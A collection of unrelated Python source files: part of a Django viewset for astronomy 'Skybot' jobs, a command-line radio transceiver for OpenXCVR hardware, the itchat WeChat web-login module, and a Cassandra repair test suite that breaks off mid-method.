pk (int): id do job.
Returns:
result (json): json com dois objetos "request" e "loaddata" que remetem ao conteúdo dos arquivos de progresso.
"""
# Instãncia do model SkybotJob pela chave primária:
job = self.get_object()
# Instância do DesSkybotPipeline
pipeline = DesSkybotPipeline()
# Ler arquivo request_heartbeat.json
request = pipeline.read_request_heartbeat(job.path)
# Ler arquivo loaddata_heartbeat.json
loaddata = pipeline.read_loaddata_heartbeat(job.path)
return Response({
"request": request,
"loaddata": loaddata,
})
@action(detail=False)
def calc_execution_time(self, request):
"""
Calcula o tempo estimado de execução para o skybot baseado na quantidade de exposições a serem executadas.
Exemplo: http://localhost/api/des/skybot_job/calc_execution_time/?to_execute=500
Parameters:
to_execute (int): Quantidade de exposições a serem executadas.
"""
to_execute = request.query_params.get('to_execute')
estimated_time = self.estimate_execution_time(to_execute)
return Response({
'estimated_time': estimated_time
})
@action(detail=True)
def time_profile(self, request, pk=None):
"""Retorna o Time Profile para um job que já foi concluido.
le os arquivos requests e loaddata que estão no diretório do job,
e retonra um array para cada um deles. no seguinte formato
request: [['exposure', 'start', 'finish',
'positions', 'execution_time'],...]
loaddata: [['exposure', 'start', 'finish',
'positions', 'execution_time'],...]
"""
job = self.get_object()
if job.status != 3:
return Response(dict({
'success': False,
'message': "Time profile is only available for jobs with status completed."
}))
# Instância do DesSkybotPipeline
pipeline = DesSkybotPipeline()
# Ler o arquivo de requests
df_request = pipeline.read_request_dataframe(job.path)
d_request = df_request.filter(
['exposure', 'start', 'finish', 'positions', 'execution_time'], axis=1).values
a_request = d_request.tolist()
# Ler o arquivo de loaddata
l_filepath = pipeline.get_loaddata_dataframe_filepath(job.path)
df_loaddata = pipeline.read_loaddata_dataframe(l_filepath)
d_loaddata = df_loaddata.filter(
['exposure', 'start', 'finish', 'positions', 'execution_time'], axis=1).values
a_loaddata = d_loaddata.tolist()
return Response(dict({
'success': True,
'columns': ['exposure', 'start', 'finish', 'positions', 'execution_time'],
'requests': a_request,
'loaddata': a_loaddata
}))
@action(detail=True)
def nites_success_or_fail(self, request, pk=None):
"""Retorna todas as datas que executaram com sucesso por completo e as que retornaram com no mínimo uma falha, dentro do periodo, que foram executadas pelo skybot.
Exemplo: http://localhost/api/des/skybot_job/11/nites_success_or_fails/
Returns:
[array]: um array com todas as datas do periodo no formato [{date: '2019-01-01', count: 0, executed: 0}]
O atributo executed pode ter 4 valores:
0 - para datas que não tem exposição;
1 - para datas que tem exposição mas não foram executadas;
2 - para datas que tem exposição, foram executadas e finalizaram com sucesso;
3 - para datas que tem exposição, foram executadas e finalizaram com erro.
"""
job = self.get_object()
file_path = os.path.join(job.path, 'results.csv')
job_result = pd.read_csv(file_path, delimiter=';', usecols=[
'date_obs', 'success', 'request_error', 'loaddata_error'])
job_result['date_obs'] = job_result['date_obs'].apply(
lambda x: x.split()[0])
job_result['count'] = 1
# Sometimes the error property comes as a '0.0', even though it doesn't have an error,
# So in here we replace it with np.nan to treat it later
job_result['request_error'] = job_result['request_error'].apply(
lambda x: np.nan if x == 0.0 else x)
job_result['loaddata_error'] = job_result['loaddata_error'].apply(
lambda x: np.nan if x == 0.0 else x)
# Verify if either or both request or loadata failed, fill the property is_success with False, otherwise with True
job_result['is_success'] = job_result[['request_error', 'loaddata_error']].apply(
lambda row: True if np.isnan(row['request_error']) and np.isnan(row['loaddata_error']) else False, axis=1)
job_result.drop(columns=['request_error', 'loaddata_error'])
job_result['error'] = job_result['is_success'].apply(
lambda x: 0 if x else 1)
# Group by "date_obs" so we know if that day failed or not
df1 = job_result.groupby(by='date_obs', as_index=False).agg(
{'count': 'sum', 'error': 'sum', 'success': 'all', 'is_success': 'all'})
# Function that applies the value of the attributes based on the comparison of 'success' and 'error' properties
def apply_success_value(row):
if row['success'] == True and row['is_success'] == True:
return 2
elif row['success'] == False and row['is_success'] == False:
return 3
else:
return 1
df1['success'] = df1.apply(apply_success_value, axis=1)
df1.drop(columns=['is_success'])
start = str(job.date_initial)
end = str(job.date_final)
all_dates = get_days_interval(start, end)
# Verificar a quantidade de dias entre o start e end.
if len(all_dates) < 7:
dt_start = datetime.strptime(start, '%Y-%m-%d')
dt_end = dt_start + timedelta(days=6)
all_dates = get_days_interval(dt_start.strftime(
"%Y-%m-%d"), dt_end.strftime("%Y-%m-%d"))
df2 = pd.DataFrame()
df2['date_obs'] = all_dates
df2['success'] = 0
df2['count'] = 0
df2['error'] = 0
df1['date_obs'] = df1['date_obs'].astype(str)
df2['date_obs'] = df2['date_obs'].astype(str)
df1['success'] = df1['success'].astype(int)
df2['success'] = df2['success'].astype(int)
df1['count'] = df1['count'].astype(int)
df2['count'] = df2['count'].astype(int)
df1['error'] = df1['error'].astype(int)
df2['error'] = df2['error'].astype(int)
for i, row in df1.iterrows():
df2.loc[
df2['date_obs'] == row['date_obs'],
['success', 'count']
] = row['success'], row['count']
df = df2.rename(columns={'date_obs': 'date', 'success': 'executed'})
result = df.to_dict('records')
return Response(result)
def run_summary_result(self):
summary_result = SummaryResult()
summary_result.run_by_year()
summary_result.run_by_dynclass()
@action(detail=False)
def test_update_dashboard(self, request, pk=None):
t = threading.Thread(target=self.run_summary_result)
t.setDaemon(True)
t.start()
return Response({
'success': True,
})
|
transceiver.py
|
#!/usr/bin/env python3
# python modules
import sys
import time
import subprocess
from multiprocessing import Process, Queue
import atexit
import argparse
import logging
# numpy etc
import numpy as np
import matplotlib.pyplot as plt
# open xcvr modules
import openxcvr
from cat_server import cat_server, command_queue, request_queue, response_queue
# A table of the playback sample rates for each mode
sample_rate_for_modes = {
"AM": 12207,
"LSB": 6103,
"USB": 6103,
"FM": 24414,
"NFM": 24414,
"CW": 8138,
}
def convert_16to8(data):
data = np.frombuffer(data, dtype="int16") / 256
return data.astype("int8")
def terminate_process(p):
"""Quit process nicely at first, then forcefully"""
# try to quit cleanly
p.terminate()
try:
outs, errs = p.communicate(timeout=1)
logging.debug("process exited %s %s", outs, errs)
except subprocess.TimeoutExpired:
# if that doesn't work quite by force
p.kill()
outs, errs = p.communicate()
logging.debug("process killed %s %s", outs, errs)
class Transceiver:
def __init__(self, port, mode, frequency, squelch, agc, server_host, server_port):
xcvr = openxcvr.Xcvr(port)
self.xcvr = xcvr
# keep local copies of settings so we know where we are
if mode is None:
xcvr.request_mode()
self.mode = xcvr.get_mode()
else:
self.mode = mode
if frequency is None:
xcvr.request_frequency()
self.frequency = xcvr.get_frequency()
else:
self.frequency = frequency
self.squelch = squelch
self.agc = agc
self.tx_rx = 0
# create an xcvr instance to communicate with the hardware
xcvr.set_frequency(self.frequency)
xcvr.set_mode(self.mode)
xcvr.set_squelch(squelch)
xcvr.set_AGC(agc)
xcvr.set_volume(0)
# start a tcp server listening for cat commands
self.command_queue = command_queue
self.request_queue = request_queue
self.response_queue = response_queue
self.cp = Process(
target=cat_server, args=(frequency, mode, server_host, server_port)
)
self.cp.start()
def receive(self):
"""Read audio a block at a time from the receiver and send to the sound card
Whenever there is a command that needs to be processed, quit transmitting and
process it.
"""
logging.info("transceiver: start receiving")
# request extra packet at start so there is always one ready
self.xcvr.request_audio_output()
while 1:
if not self.command_queue.empty():
break
request = None
if not self.request_queue.empty():
request = self.request_queue.get()
if request == "frequency" :
self.xcvr.request_frequency()
elif request == "mode" :
self.xcvr.request_mode()
elif request == "tx" :
self.xcvr.request_TX()
self.xcvr.request_audio_output()
data = self.xcvr.get_audio()
self.player.stdin.write(data)
if request is not None:
if request == "frequency" :
self.frequency = self.xcvr.get_frequency()
self.response_queue.put(self.frequency)
elif request == "mode" :
mode = self.xcvr.get_mode()
self.response_queue.put(mode)
if mode != self.mode:
self.mode = mode
break
elif request == "tx" :
tx_rx = self.xcvr.get_TX()
self.response_queue.put(tx_rx)
if tx_rx != self.tx_rx:
self.tx_rx = tx_rx
break
# when complete, play the extra packet
data = self.xcvr.get_audio() # process extra request once finished
self.player.stdin.write(data)
logging.info("transceiver: stop receiving")
def transmit(self):
"""Read audio a block at a time from the soundcard and send to the transmitter
Whenever there is a command that needs to be processed, quit transmitting and
process it.
"""
logging.info("transceiver: start transmitting")
self.xcvr.set_USB_audio(1)
self.xcvr.set_TX(1)
self.recorder = subprocess.Popen(
["arecord", "-t", "raw", "--format=S16_LE", "--rate=50000"],
stdout=subprocess.PIPE,
)
t0 = time.time()
samples_sent = 0
#transmit can be jittery to start presumably while buffers are filling up
#adding a bit of silence at the start of each transmission seems to help
silence = b"\x00"*1024
for i in range(20):
self.xcvr.put_audio(silence)
while 1:
if not self.command_queue.empty():
break
#In TX mode, settings can't be changed, so just echo local copies
if not self.request_queue.empty():
request = self.request_queue.get()
if request == "frequency" :
self.response_queue.put(self.frequency)
elif request == "mode" :
self.response_queue.put(self.mode)
elif request == "tx" :
self.response_queue.put(self.tx_rx)
# send a block
data = convert_16to8(self.recorder.stdout.read(1024*2))
#data = np.sin(np.arange(1024)*2.0*np.pi/32)*127
#data = data.astype("int8")
#samples_sent += len(data)
#elapsed = time.time() - t0
#logging.info(samples_sent / elapsed)
self.xcvr.put_audio(data.tobytes())
self.xcvr.set_USB_audio(0)
self.xcvr.set_TX(0)
terminate_process(self.recorder)
logging.info("transceiver: stop transmitting")
def process_commands(self):
"""Sit in a loop processing commands from the cat server.
Whenever we aren't receiving commands, we are either transmitting or receiving
"""
# start out in receive mode
self.player = subprocess.Popen(
[
"aplay",
"-t",
"raw",
"--format=S16_LE",
"--rate=%u" % sample_rate_for_modes[self.mode],
],
stdin=subprocess.PIPE,
)
self.receive()
while 1:
while not self.command_queue.empty():
# pull command from command stream
command, value = self.command_queue.get()
if command == "frequency":
logging.info("transceiver: executing frequency command")
self.frequency = value
self.xcvr.set_frequency(self.frequency)
elif command == "mode":
logging.info("transceiver: executing mode command")
terminate_process(self.player)
self.mode = value
self.xcvr.set_mode(self.mode)
self.player = subprocess.Popen(
[
"aplay",
"-t",
"raw",
"--format=S16_LE",
"--rate=%u" % sample_rate_for_modes[self.mode],
],
stdin=subprocess.PIPE,
)
elif command == "tx":
logging.info("transceiver: executing tx_rx command")
self.tx_rx = int(value)
else:
assert False
if self.tx_rx:
self.transmit()
else:
self.receive()
def __del__(self):
"""Run clean-up of child processes"""
logging.info("transceiver: running clean-up")
if hasattr(self, "cp"):
self.cp.terminate()
if hasattr(self, "player"):
terminate_process(self.player)
if hasattr(self, "recorder"):
terminate_process(self.recorder)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="OpenXCVR command line transceiver")
parser.add_argument(
"-p",
"--port",
default="/dev/ttyUSB0",
help="USB serial port to connect to OpenXCVR hardware",
)
parser.add_argument(
"-m",
"--mode",
choices=openxcvr.modes.keys(),
help="Mode (AM, FM, NFM, USB, LSB, CW)",
)
parser.add_argument(
"-f", "--frequency", type=float, help="frequency (Hz)"
)
parser.add_argument(
"-s",
"--squelch",
default=0,
type=int,
choices=range(13),
help="squelch (0=s0, 9=s9, 10=s9+10dB, 11=s9+20dB, 12=s9+30dB)",
)
parser.add_argument(
"-a",
"--agc",
default="VERY_SLOW",
choices=openxcvr.agc_speeds.keys(),
help="AGC speed (very slow, slow, normal, fast)",
)
parser.add_argument(
"-lp",
"--server_host",
default="0.0.0.0",
help="port to bind rigtld compatible server",
)
parser.add_argument(
"-lh",
"--server_port",
default=4532,
type=int,
help="IP address to bind rigctld compatible server",
)
args = parser.parse_args()
logging.basicConfig(format="%(levelname)s:%(message)s", level=logging.INFO)
trx = Transceiver(
args.port,
args.mode,
args.frequency,
args.squelch,
args.agc,
args.server_host,
args.server_port,
)
trx.process_commands()
|
login.py
|
import os, sys, time, re, io
import threading
import json, xml.dom.minidom
import copy, pickle, random
import traceback, logging
import requests
from .. import config, utils
from ..returnvalues import ReturnValue
from .contact import update_local_chatrooms, update_local_friends
from .messages import produce_msg
logger = logging.getLogger('itchat')
def load_login(core):
core.login = login
core.get_QRuuid = get_QRuuid
core.get_QR = get_QR
core.check_login = check_login
core.web_init = web_init
core.show_mobile_login = show_mobile_login
core.start_receiving = start_receiving
core.get_msg = get_msg
core.logout = logout
def login(self, enableCmdQR=False, picDir=None, qrCallback=None,
loginCallback=None, exitCallback=None):
if self.alive:
logger.warning('itchat has already logged in.')
return
while 1:
for getCount in range(10):
logger.info('Getting uuid of QR code.')
while not self.get_QRuuid(): time.sleep(1)
logger.info('Downloading QR code.')
qrStorage = self.get_QR(enableCmdQR=enableCmdQR,
picDir=picDir, qrCallback=qrCallback)
if qrStorage:
break
elif 9 == getCount:
logger.info('Failed to get QR code, please restart the program.')
sys.exit()
logger.info('Please scan the QR code to log in.')
isLoggedIn = False
while not isLoggedIn:
status = self.check_login()
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=self.uuid, status=status, qrcode=qrStorage.getvalue())
if status == '200':
isLoggedIn = True
elif status == '201':
if isLoggedIn is not None:
logger.info('Please press confirm on your phone.')
isLoggedIn = None
elif status != '408':
break
if isLoggedIn: break
logger.info('Log in time out, reloading QR code')
self.web_init()
self.show_mobile_login()
self.get_contact(True)
if hasattr(loginCallback, '__call__'):
r = loginCallback()
else:
utils.clear_screen()
if os.path.exists(picDir or config.DEFAULT_QR):
os.remove(picDir or config.DEFAULT_QR)
logger.info('Login successfully as %s' % self.storageClass.nickName)
self.start_receiving(exitCallback)
def get_QRuuid(self):
url = '%s/jslogin' % config.BASE_URL
params = {
'appid' : 'wx782c26e4c19acffb',
'fun' : 'new', }
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
self.uuid = data.group(2)
return self.uuid
def get_QR(self, uuid=None, enableCmdQR=False, picDir=None, qrCallback=None):
uuid = uuid or self.uuid
picDir = picDir or config.DEFAULT_QR
url = '%s/qrcode/%s' % (config.BASE_URL, uuid)
headers = { 'User-Agent' : config.USER_AGENT }
try:
r = self.s.get(url, stream=True, headers=headers)
except:
return False
qrStorage = io.BytesIO(r.content)
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=uuid, status='0', qrcode=qrStorage.getvalue())
else:
with open(picDir, 'wb') as f: f.write(r.content)
if enableCmdQR:
utils.print_cmd_qr(picDir, enableCmdQR=enableCmdQR)
else:
utils.print_qr(picDir)
return qrStorage
def check_login(self, uuid=None):
uuid = uuid or self.uuid
url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL
localTime = int(time.time())
params = 'loginicon=true&uuid=%s&tip=0&r=%s&_=%s' % (
uuid, localTime / 1579, localTime)
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.code=(\d+)'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
process_login_info(self, r.text)
return '200'
elif data:
return data.group(1)
else:
return '400'
def process_login_info(core, loginContent):
''' when finish login (scanning qrcode)
* syncUrl and fileUploadingUrl will be fetched
* deviceid and msgid will be generated
* skey, wxsid, wxuin, pass_ticket will be fetched
'''
regx = r'window.redirect_uri="(\S+)";'
core.loginInfo['url'] = re.search(regx, loginContent).group(1)
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False)
core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')]
for indexUrl, detailedUrl in (
("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")),
("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")),
("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")),
("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")),
("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))):
fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl]
if indexUrl in core.loginInfo['url']:
core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \
fileUrl, syncUrl
break
else:
core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url']
core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17]
core.loginInfo['BaseRequest'] = {}
for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes:
if node.nodeName == 'skey':
core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data
elif node.nodeName == 'wxsid':
core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data
elif node.nodeName == 'wxuin':
core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data
def web_init(self):
url = '%s/webwxinit?r=%s' % (self.loginInfo['url'], int(time.time()))
data = { 'BaseRequest': self.loginInfo['BaseRequest'], }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
# deal with login info
utils.emoji_formatter(dic['User'], 'NickName')
self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount'])
self.loginInfo['User'] = utils.struct_friend_info(dic['User'])
self.loginInfo['SyncKey'] = dic['SyncKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncKey']['List']])
self.storageClass.userName = dic['User']['UserName']
self.storageClass.nickName = dic['User']['NickName']
return dic
def show_mobile_login(self):
url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'Code' : 3,
'FromUserName' : self.storageClass.userName,
'ToUserName' : self.storageClass.userName,
'ClientMsgId' : int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
return ReturnValue(rawResponse=r)
def start_receiving(self, exitCallback=None, getReceivingFnOnly=False):
self.alive = True
def maintain_loop():
retryCount = 0
while self.alive:
try:
i = sync_check(self)
if i is None:
self.alive = False
elif i == '0':
continue
else:
msgList, contactList = self.get_msg()
if msgList:
msgList = produce_msg(self, msgList)
for msg in msgList: self.msgList.put(msg)
if contactList:
chatroomList, otherList = [], []
for contact in contactList:
if '@@' in contact['UserName']:
chatroomList.append(contact)
else:
otherList.append(contact)
chatroomMsg = update_local_chatrooms(self, chatroomList)
self.msgList.put(chatroomMsg)
update_local_friends(self, otherList)
retryCount = 0
except:
retryCount += 1
logger.error(traceback.format_exc())
if self.receivingRetryCount < retryCount:
self.alive = False
else:
time.sleep(1)
self.logout()
if hasattr(exitCallback, '__call__'):
exitCallback()
else:
logger.info('LOG OUT!')
if getReceivingFnOnly:
return maintain_loop
else:
maintainThread = threading.Thread(target=maintain_loop)
maintainThread.setDaemon(True)
maintainThread.start()
def sync_check(self):
url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url'])
params = {
'r' : int(time.time() * 1000),
'skey' : self.loginInfo['skey'],
'sid' : self.loginInfo['wxsid'],
'uin' : self.loginInfo['wxuin'],
'deviceid' : self.loginInfo['deviceid'],
'synckey' : self.loginInfo['synckey'],
'_' : int(time.time() * 1000),}
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
pm = re.search(regx, r.text)
if pm is None or pm.group(1) != '0':
logger.debug('Unexpected sync check result: %s' % r.text)
return None
return pm.group(2)
def get_msg(self):
url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['wxsid'],
self.loginInfo['skey'],self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'SyncKey' : self.loginInfo['SyncKey'],
'rr' : ~int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT }
r = self.s.post(url, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
if dic['BaseResponse']['Ret'] != 0: return None, None
self.loginInfo['SyncKey'] = dic['SyncCheckKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncCheckKey']['List']])
return dic['AddMsgList'], dic['ModContactList']
def logout(self):
if self.alive:
url = '%s/webwxlogout' % self.loginInfo['url']
params = {
'redirect' : 1,
'type' : 1,
'skey' : self.loginInfo['skey'], }
headers = { 'User-Agent' : config.USER_AGENT }
self.s.get(url, params=params, headers=headers)
self.alive = False
self.s.cookies.clear()
del self.chatroomList[:]
del self.memberList[:]
del self.mpList[:]
return ReturnValue({'BaseResponse': {
'ErrMsg': 'logout successfully.',
'Ret': 0, }})
|
repair_test.py
|
import threading
import time
from collections import namedtuple
from unittest import skip
from cassandra import ConsistencyLevel
from cassandra.query import SimpleStatement
from dtest import FlakyRetryPolicy, Tester, debug
from tools import insert_c1c2, known_failure, no_vnodes, query_c1c2, since
def _repair_options(version, ks='', cf=None, sequential=True):
"""
Function for assembling appropriate repair CLI options,
based on C* version, as defaults have changed.
@param ks The keyspace to repair
@param cf The table to repair
@param sequential If the repair should be a sequential repair [vs parallel]
"""
opts = []
# since version 2.2, default is parallel, otherwise it's sequential
if sequential:
if version >= '2.2':
opts += ['-seq']
else:
if version < '2.2':
opts += ['-par']
# test with full repair
if version >= '2.2':
opts += ['-full']
if ks:
opts += [ks]
if cf:
opts += [cf]
return opts
class BaseRepairTest(Tester):
__test__ = False
def check_rows_on_node(self, node_to_check, rows, found=None, missings=None, restart=True):
"""
Function to verify the rows on a given node, without interference
from the other nodes in the cluster
@param node_to_check The given node to check. Should be the node, not the index
@param rows The number of rows we expect
@param found A list of partition keys that we expect to be on the node
@param missings A list of partition keys we expect NOT to be on the node
@param restart Whether or not we should restart the nodes we shut down to perform the assertions. Should only be False if the call to check_rows_on_node is the last line in the test.
"""
if found is None:
found = []
if missings is None:
missings = []
stopped_nodes = []
for node in self.cluster.nodes.values():
if node.is_running() and node is not node_to_check:
stopped_nodes.append(node)
node.stop(wait_other_notice=True)
session = self.patient_exclusive_cql_connection(node_to_check, 'ks')
result = list(session.execute("SELECT * FROM cf LIMIT {}".format(rows * 2)))
self.assertEqual(len(result), rows)
for k in found:
query_c1c2(session, k, ConsistencyLevel.ONE)
for k in missings:
query = SimpleStatement("SELECT c1, c2 FROM cf WHERE key='k{}'".format(k), consistency_level=ConsistencyLevel.ONE)
res = list(session.execute(query))
self.assertEqual(len(filter(lambda x: len(x) != 0, res)), 0, res)
if restart:
for node in stopped_nodes:
node.start(wait_other_notice=True)
def _populate_cluster(self, start=True):
cluster = self.cluster
# Disable hinted handoff and set batch commit log so this doesn't
# interfere with the test (this must be after the populate)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
session = self.patient_cql_connection(node1)
session.cluster.default_retry_policy = FlakyRetryPolicy(max_retries=15)
self.create_ks(session, 'ks', 3)
self.create_cf(session, 'cf', read_repair=0.0, columns={'c1': 'text', 'c2': 'text'})
# Insert 1000 keys, kill node 3, insert 1 key, restart node 3, insert 1000 more keys
debug("Inserting data...")
insert_c1c2(session, n=1000, consistency=ConsistencyLevel.ALL)
node3.flush()
node3.stop(wait_other_notice=True)
insert_c1c2(session, keys=(1000, ), consistency=ConsistencyLevel.TWO)
node3.start(wait_other_notice=True, wait_for_binary_proto=True)
insert_c1c2(session, keys=range(1001, 2001), consistency=ConsistencyLevel.ALL)
cluster.flush()
def _repair_and_verify(self, sequential=True):
cluster = self.cluster
node1, node2, node3 = cluster.nodelist()
# Verify that node3 has only 2000 keys
debug("Checking data on node3...")
self.check_rows_on_node(node3, 2000, missings=[1000])
# Verify that node1 has 2001 keys
debug("Checking data on node1...")
self.check_rows_on_node(node1, 2001, found=[1000])
# Verify that node2 has 2001 keys
debug("Checking data on node2...")
self.check_rows_on_node(node2, 2001, found=[1000])
time.sleep(10) # see CASSANDRA-4373
# Run repair
start = time.time()
debug("starting repair...")
node1.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential))
debug("Repair time: {end}".format(end=time.time() - start))
# Validate that only one range was transfered
out_of_sync_logs = node1.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync")
self.assertEqual(len(out_of_sync_logs), 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs]))
valid_out_of_sync_pairs = [{node1.address(), node3.address()},
{node2.address(), node3.address()}]
for line, m in out_of_sync_logs:
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
self.assertEqual(int(num_out_of_sync_ranges), 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, line))
self.assertIn(out_of_sync_nodes, valid_out_of_sync_pairs, str(out_of_sync_nodes))
# Check node3 now has the key
self.check_rows_on_node(node3, 2001, found=[1000], restart=False)
class TestRepair(BaseRepairTest):
__test__ = True
@since('2.2.1')
def no_anticompaction_after_dclocal_repair_test(self):
"""
* Launch a four node, two DC cluster
* Start a -local repair on node1 in dc1
* Assert that the dc1 nodes see repair messages
* Assert that the dc2 nodes do not see repair messages
* Assert no nodes anticompact
# TODO: Verify the anticompaction with sstablemetadata, not just logs
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
debug("Starting cluster..")
cluster.populate([2, 2]).start(wait_for_binary_proto=True)
node1_1, node2_1, node1_2, node2_2 = cluster.nodelist()
node1_1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)', '-rate', 'threads=50'])
node1_1.nodetool("repair -local keyspace1 standard1")
self.assertTrue(node1_1.grep_log("Not a global repair"))
self.assertTrue(node2_1.grep_log("Not a global repair"))
# dc2 should not see these messages:
self.assertFalse(node1_2.grep_log("Not a global repair"))
self.assertFalse(node2_2.grep_log("Not a global repair"))
# and no nodes should do anticompaction:
for node in cluster.nodelist():
self.assertFalse(node.grep_log("Starting anticompaction"))
@since('2.2.1')
def no_anticompaction_after_hostspecific_repair_test(self):
"""
* Launch a four node, two DC cluster
* Start a repair on all nodes, by enumerating with -hosts
* Assert all nodes see a repair messages
* Assert no nodes anticompact
# TODO: Verify the anticompaction with sstablemetadata, not just logs
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
debug("Starting cluster..")
cluster.populate([2, 2]).start(wait_for_binary_proto=True)
node1_1, node2_1, node1_2, node2_2 = cluster.nodelist()
node1_1.stress(stress_options=['write', 'n=100K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)', '-rate', 'threads=50'])
node1_1.nodetool("repair -hosts 127.0.0.1,127.0.0.2,127.0.0.3,127.0.0.4 keyspace1 standard1")
for node in cluster.nodelist():
self.assertTrue(node.grep_log("Not a global repair"))
for node in cluster.nodelist():
self.assertFalse(node.grep_log("Starting anticompaction"))
@since('2.2.4')
def no_anticompaction_after_subrange_repair_test(self):
"""
* Launch a three node, two DC cluster
* Start a repair on a token range
* Assert all nodes see repair messages
* Assert no nodes anticompact
# TODO: Verify the anticompaction with sstablemetadata, not just logs
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
debug("Starting cluster..")
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
node1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=50'])
node1.nodetool("repair -st 0 -et 1000 keyspace1 standard1")
for node in cluster.nodelist():
self.assertTrue(node.grep_log("Not a global repair"))
for node in cluster.nodelist():
self.assertFalse(node.grep_log("Starting anticompaction"))
@since('2.2.1')
def anticompaction_after_normal_repair_test(self):
"""
* Launch a four node, two DC cluster
* Start a normal repair
* Assert every node anticompacts
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
debug("Starting cluster..")
cluster.populate([2, 2]).start(wait_for_binary_proto=True)
node1_1, node2_1, node1_2, node2_2 = cluster.nodelist()
node1_1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)'])
node1_1.nodetool("repair keyspace1 standard1")
for node in cluster.nodelist():
self.assertTrue("Starting anticompaction")
@known_failure(failure_source='test',
jira_url='https://issues.apache.org/jira/browse/CASSANDRA-12162',
flaky=True,
notes='windows')
def simple_sequential_repair_test(self):
"""
Calls simple repair test with a sequential repair
"""
self._simple_repair(sequential=True)
@known_failure(failure_source='test',
jira_url='https://issues.apache.org/jira/browse/CASSANDRA-11247',
flaky=True,
notes='windows')
def simple_parallel_repair_test(self):
"""
Calls simple repair test with a parallel repair
"""
self._simple_repair(sequential=False)
def empty_vs_gcable_sequential_repair_test(self):
"""
Calls empty_vs_gcable repair test with a sequential repair
"""
self._empty_vs_gcable_no_repair(sequential=True)
def empty_vs_gcable_parallel_repair_test(self):
"""
Calls empty_vs_gcable repair test with a parallel repair
"""
self._empty_vs_gcable_no_repair(sequential=False)
def range_tombstone_digest_sequential_repair_test(self):
"""
Calls range_tombstone_digest with a sequential repair
"""
self._range_tombstone_digest(sequential=True)
def range_tombstone_digest_parallel_repair_test(self):
"""
Calls range_tombstone_digest with a parallel repair
"""
self._range_tombstone_digest(sequential=False)
@since('2.1')
def shadowed_cell_digest_sequential_repair_test(self):
"""
Calls _cell_shadowed_by_range_tombstone with sequential repair
"""
self._cell_shadowed_by_range_tombstone(sequential=True)
@since('2.1')
def shadowed_cell_digest_parallel_repair_test(self):
"""
